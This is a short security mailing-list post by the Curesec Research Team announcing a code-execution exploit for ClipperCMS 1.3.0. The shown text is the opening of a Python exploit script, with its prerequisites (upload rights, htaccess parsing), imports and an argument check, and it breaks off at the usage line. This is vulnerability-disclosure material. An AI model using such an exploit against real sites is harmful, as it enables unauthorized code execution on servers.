ClipperCMS 1.3.0: Code Execution Exploit

Posted by Curesec Research Team (CRT) on Nov 14

#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (e.g. a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt () curesec com

import sys
import re
import requests # requires requests lib

if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + "…